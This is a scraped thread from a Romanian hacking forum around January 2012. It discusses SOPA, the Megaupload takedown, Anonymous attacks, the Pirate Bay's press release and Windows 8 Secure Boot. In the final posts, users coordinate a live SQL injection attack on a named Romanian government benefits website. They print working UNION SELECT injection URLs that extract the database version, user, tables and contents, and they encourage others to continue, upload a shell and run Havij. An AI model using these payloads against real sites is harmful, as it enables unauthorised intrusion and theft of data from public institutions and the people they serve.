  15. https://rstcenter.com/forum/47277-anonymous-downs-government-music-industry-sites-largest-attack-ever.rst Tit for Tat - Anonymous Hackers Brings Down FBI website for #OpMegaupload | The Hacker News (THN) https://rstcenter.com/forum/47268-anonymouswiki.rst Anonymous threatens Sony with anti-SOPA attack - Security - Technology - News - iTnews.com.au Eu nu vorbesc de Anonymousii aia falsi , eu vorbesc de cei care participa la aceste operatiuni si fac ceva. Daca tu crezi ca nu e nimic special atunci incearca sa faci acelasi lucru pentru ca ce am pus mai sus nu sunt minciuni (ma refer la linkuri) si in + de ce ai luat in considerare doar partea care nu iti convine din postul meu? care nu stiu daca l-ai citit tot. Ei chiar au facut ceva chiar daca multi se dau ei si nu stim cui sa multumim. Nu poti spune ca sunt mascarici cand fac astfel de lucruri (nu ca ai fi spus).Nu vreau sa ii ridic in slavi dar ei practica ce spunem noi pe acest forum. Sper ca ai inteles ce am vrut sa zic .
  16. O "continuare" a articolului aici: Tit for Tat - Anonymous Hackers Brings Down FBI website for #OpMegaupload | The Hacker News (THN)
  17. INTERNETS, 18th of January 2012. PRESS RELEASE, FOR IMMEDIATE RELEASE. Over a century ago Thomas Edison got the patent for a device which would "do for the eye what the phonograph does for the ear". He called it the Kinetoscope. He was not only amongst the first to record video, he was also the first person to own the copyright to a motion picture. Because of Edisons patents for the motion pictures it was close to financially impossible to create motion pictures in the North american east coast. The movie studios therefor relocated to California, and founded what we today call Hollywood. The reason was mostly because there was no patent. There was also no copyright to speak of, so the studios could copy old stories and make movies out of them - like Fantasia, one of Disneys biggest hits ever. So, the whole basis of this industry, that today is screaming about losing control over immaterial rights, is that they circumvented immaterial rights. They copied (or put in their terminology: "stole") other peoples creative works, without paying for it. They did it in order to make a huge profit. Today, they're all successful and most of the studios are on the Fortune 500 list of the richest companies in the world. Congratulations - it's all based on being able to re-use other peoples creative works. And today they hold the rights to what other people create. If you want to get something released, you have to abide to their rules. The ones they created after circumventing other peoples rules. The reason they are always complainting about "pirates" today is simple. We've done what they did. We circumvented the rules they created and created our own. We crushed their monopoly by giving people something more efficient. We allow people to have direct communication between eachother, circumventing the profitable middle man, that in some cases take over 107% of the profits (yes, you pay to work for them). It's all based on the fact that we're competition. We've proven that their existance in their current form is no longer needed. We're just better than they are. And the funny part is that our rules are very similar to the founding ideas of the USA. We fight for freedom of speech. We see all people as equal. We believe that the public, not the elite, should rule the nation. We believe that laws should be created to serve the public, not the rich corporations. The Pirate Bay is truly an international community. The team is spread all over the globe - but we've stayed out of the USA. We have Swedish roots and a swedish friend said this: The word SOPA means "trash" in Swedish. The word PIPA means "a pipe" in Swedish. This is of course not a coincidence. They want to make the internet inte a one way pipe, with them at the top, shoving trash through the pipe down to the rest of us obedient consumers. The public opinion on this matter is clear. Ask anyone on the street and you'll learn that noone wants to be fed with trash. Why the US government want the american people to be fed with trash is beyond our imagination but we hope that you will stop them, before we all drown. SOPA can't do anything to stop TPB. Worst case we'll change top level domain from our current .org to one of the hundreds of other names that we already also use. In countries where TPB is blocked, China and Saudi Arabia springs to mind, they block hundreds of our domain names. And did it work? Not really. To fix the "problem of piracy" one should go to the source of the problem. The entertainment industry say they're creating "culture" but what they really do is stuff like selling overpriced plushy dolls and making 11 year old girls become anorexic. Either from working in the factories that creates the dolls for basically no salary or by watching movies and tv shows that make them think that they're fat. In the great Sid Meiers computer game Civilization you can build Wonders of the world. One of the most powerful ones is Hollywood. With that you control all culture and media in the world. Rupert Murdoch was happy with MySpace and had no problems with their own piracy until it failed. Now he's complainting that Google is the biggest source of piracy in the world - because he's jealous. He wants to retain his mind control over people and clearly you'd get a more honest view of things on Wikipedia and Google than on Fox News. Some facts (years, dates) are probably wrong in this press release. The reason is that we can't access this information when Wikipedia is blacked out. Because of pressure from our failing competitors. We're sorry for that. THE PIRATE BAY, (K)2012 Sursa se vede dar totusi (poate opreste SOPA RST-ul pentru copyright la thepiratebay): http://static.thepiratebay.org/legal/sopa.txt
  18. Mda...ce pot sa zic,cate lucruri se pot intampla peste noapte.Deocamdata s-a dus o sursa importanta de download,mai sunt, dar daca le inchid asa peste noapte ... e grav.Sa ne opreasca si fisierulmeu si sa vezi atunci.Megaupload era folosit pentru chestii mai importante filme,jocuri,programe si era folosit la nivel international.Revolta va aparea cand se vor opri si sursele de download pentru oameni obisnuiti , sa ne gandim ca noi RST nu aprindem calculatorul o data pe zi sa ascultam guta ci cu el ne dezvoltam as putea zice , iar sursele de download sunt hrana noastra.Doar ganditiva ca aveti un soft si nu aveti cum sa il impartasiti celorlalti membri.Lovitura pentru Romania va fi oprirea surselor complet romanesti din care oamenii OBISNUITI isi iau muzica,etc si care nu sunt ca noi de priceputi sa poata cauta in toate site-urile sau mai stiu eu ce.Atunci oamenii nu vor mai putea decat sa cumpera cd-uri foarte scumpe la care pretul se calculeaza dupa nivelul tarii din care a plecat produsul. Un ex : USA salariu mediu = 1000 E sa zicem pretul va si 400 E pentru un ...cd cu Windows (si cand te gandesti ca ne lasa si fara surse de download) si in Romania pretul va fi acelasi la nivelul tarii cu salariu mediu nici 300 E din care trebuie luata mancare ,intretinuti copiii platite imensele taxe (cica 3000 E o dacie din 95 de 200 ron ??)si asta determina pirateria , care este singurul lucru care ne face pe noi ca "priceputi" si oamenii obisnuiti sa stea pe calculator sa vorbeasca cu rudele si sa asculte ceva,sa vada un film,etc.O sa ajungem la revolta totala daca acum au iesit doar pentru presedinte (si multi nu stiu "de ce ?")mai tarziu vom iesi toti pentru ca toti suntem utilizatori de PC-uri.O alternativa este linux care nu poate fi folosit de toti si dupa cum am vazut Microsoft incearca sa faca orice alt OS incompatibil cu PC-ul ,chiar daca ei folosesc linux si acest lucru l-am aratat chiar ieri.Numarul de utilizatori de calculatoare va scadea si asta --> Facebook= mai putini bani,Yahoo=same,etc.Dar in general la noi nu e bine per ansamblu si va spun si de ce:
  19. To weather the MS-blaster and Sobig-F Windows viruses, Microsoft replaced its Windows-based Microsoft Corporation: Software, Smartphones, Online, Games, Cloud Computing, IT Business Technology, Downloads servers with Linux servers that could withstand the viruses in August 2003. Shouldn't you? Ford announced that it would switch its Sales force from Windows to Linux systems in September 2003. The national governments of China, France, South Korea, and Mexico already have switched. 13% of all Microsoft IIS Servers currently have a "back door" Trojan running on them, according to a Netcraft survey published September 12, 2001. We can install a reliable Linux Firewall to ensure that such a back door cannot be used or created. We can replace your unreliable, maintenance-intense, and vulnerability-prone IIS Server, Exchange mail server, file server, or backup scheme with a low-maintenance, reliable, high performance, and low cost Linux server or provide other solutions to these and many other security and administration problems. Cyberattack activity increased 79% between July and December of 2001 according to security-services vendor Riptech Inc. Don't be part of this year's statistic! Despite lots of promises by Microsoft, the rate of security patches [security bugs] in Microsoft's products for 2002 so far is the same as for 2001 according to Security Flaws Continue to Be Issue for Microsoft. Protect your vulnerable network with a secure and reliable Linux-based Firewall from Horizon Network Security! Cisco VPN 5000 Vulnerabilities What harm could a cracker do with your customers' credit card numbers? Your customer lists? Your new marketing plan to get ahead of your competition? Your new engineering designs? Your bank account numbers? Financial information that could affect your stock prices? What would this cost you? How much down time and adverse publicity can you afford? Does your SysAdmin know how to recover without throwing away all data created since the last known viable backup? Is the last backup even valid? Can you quickly determine exactly what a Cracker has altered on your systems? Security breaches are costing U.K. businesses the equivalent of each worker losing a day of work each year, according to figures announced by the British government on 24 April 2002. Half of U.K. businesses do not encrypt customer credit card data across the Internet and only a third encrypt customers' credit card data on their servers. Publicity about major security breaches have put even large companies out of business. Microsoft's top man says that Windows has so many security bugs that releasing the source code would threaten U.S. National Security. A security crisis is starting to emerge in the world of computing, writes Robin Bloor. The year 2002 will prove to be the worst year yet for hacking. The following year will probably be worse. The number of breaches of computer security and the money lost has been escalating rapidly ever since the Internet was born. If you characterize computer security as a battle between the forces of good and the forces of evil, then at the moment you have to conclude that the bad guys are winning
  20. ll the tech world loves a conspiracy, especially when it involves Microsoft, and a suggestion has been circulating that it was using its muscle to block its open-source competitor Linux with the launch of Windows 8. Concerns have focused on a feature, included in the Windows 8 hardware specification, called “UEFI Secure Boot”. The idea is this checks a series of digital signatures to ensure that no malicious programs are launched after the computer is switched on. A version of Linux without the appropriate signature could not run on a computer with secure boot enabled. Ars Technica provides a detailed explanation of the firmware’s operation and an analysis of its impact. It points out that part of the Windows 8 hardware specification is that it must allow users to install their own certificates. These could be provided by a Linux vendor. Users can also switch off secure boot or instruct the computer drop back to mimicking the current BIOS system. This combination of options should settle most concerns that were raised when news of the secure boot requirement first broke. On x86 systems, Windows 8 stands as no impediment to using non-Windows operating systems. Indeed, Microsoft’s rules ensure that vendors will make it possible to securely boot operating systems other than Windows: system builders will have no choice but to allow system owners to install their own certificates. But that is not the end of the story. Windows 8 when it launches will be the first operating system from Microsoft to support ARM processors which are used in virtually all tablet computers and smartphones. The ARM systems will all require the use of a signed operating system loader, and that operating system loader must be signed by Microsoft. Microsoft’s rules also specify that a secure boot failure must be fatal; there must be no option to override the failure and choose to boot the untrusted operating system. Further, manufacturers will be prohibited from shipping updates to their firmware that relax these restrictions; all firmware updates must be protected with digital signatures and must preserve the secure boot settings. They should also prevent the installation of older firmware versions—for example, downgrading the firmware to switch to a version with a known security flaw—though the manufacturer can allow this particular constraint to be manually overridden. So an ARM-powered device will run Windows and nothing else. It is, as Ars Technica points out, far from a unique situation. The iPad and a number of other tablets are locked already. Ars Technica concludes: Even if Microsoft’s position doesn’t change, the impact its rules will have may prove to be negligible in practice. x86 hardware will retain all the freedom and flexibility that users of alternative operating systems need. Unlocked ARM hardware is also going to continue to be widely available; it’ll just come with Android rather than Windows. Given Android’s much greater strength in the tablet market, it’s all but inevitable that Windows 8-only hardware will be a minority. Microsoft doesn’t have the market dominance to take away everyone’s ability to use alternative operating systems. If every future PC and tablet were restricted so that it could only boot a Microsoft operating system, there would indeed be the end of the world as we know it; it would fundamentally alter the nature of the PC, converting it from the supremely flexible device that it is into a well-decorated prison cell. As it is, it will simply be a choice that buyers have to make for themselves. There will be options that are locked down, including the iPad and Windows 8 ARM tablets. There will be options that are not. The decision as to which is more important—freedom or reliability—will lie with the user. Foarte interesant cum incearca Microsoft sa inlature orice alt sistem de operare facandu-le sa nu poate fi compatibile hardware,astfel singura alternativa fiind Windows 8. Ce credeti de asta? Source:http://blogs.wsj.com/tech-europe/2012/01/17/windows-8-doesnt-play-nicely-with-others/
  21. Ceva ciudat ,nu vi se pare? http://presidency.ro Is Down -> Check if your website is up or down? Presidency.ro e jos
  22. Mi-am adus aminte ca faceam injectia pe IP-ul fara nimic si cred ca am luat ban pe ip. Continuati voi.(Totti vezi e la fel ca la challange ,baga un shell) @Patrunjel atunci ma sinucid.
  23. huaaaa in p*** mea te pup Paul Am cautat dupa tutoriale SQLi in forum si a mers primu lucru care l-am incercat a mers Va tin la curent. Versiunea: http://sibiu.prestatiisociale.ro/legislatie.php?id=%285%29%20%27%20%20/*!UnIoN*/+/*!SelEcT*/+1,2,concat_ws%280x3a,table_name,@@version%29,4,5+/*!FrOm*/+information_schema.tables--+--a User: http://sibiu.prestatiisociale.ro/legislatie.php?id=%285%29%20%27%20%20/*!UnIoN*/+/*!SelEcT*/+1,2,concat_ws%280x3a,user%28%29,@@version%29,4,5+/*!FrOm*/+information_schema.tables--+--a Tabele: http://sibiu.prestatiisociale.ro/legislatie.php?id=%285%29%20%27%20%20/*!UnIoN*/+/*!SelEcT*/+1,2,group_concat%28table_name%29,4,5+/*!FrOm*/+information_schema.tables--+--a Chestie: http://sibiu.prestatiisociale.ro/legislatie.php?id=%285%29%20%27%20%20/*!UnIoN*/+/*!SelEcT*/+1,2,group_concat%28ID,0x3a,DESCR%29,4,5+/*!FrOm*/+prestatii--+--a
  24. Ceva pentru "protestantii" online (care nu dau doar like pe facebook): http://sibiu.prestatiisociale.ro/legislatie.php?id=5%20%27%20%20/*!OrDeR*/+/*!bY*/+5--+--a Doar atat am reusit... Cum spunea cineva de aici shared hosting /home/WWW/sibiu.prestatiisociale.ro/htdocs/. Cine are chef si timp sa continue (si cunostinte) sa continue injectia eu pana aici am putut. Incercati si havij )
×
×
  • Create New...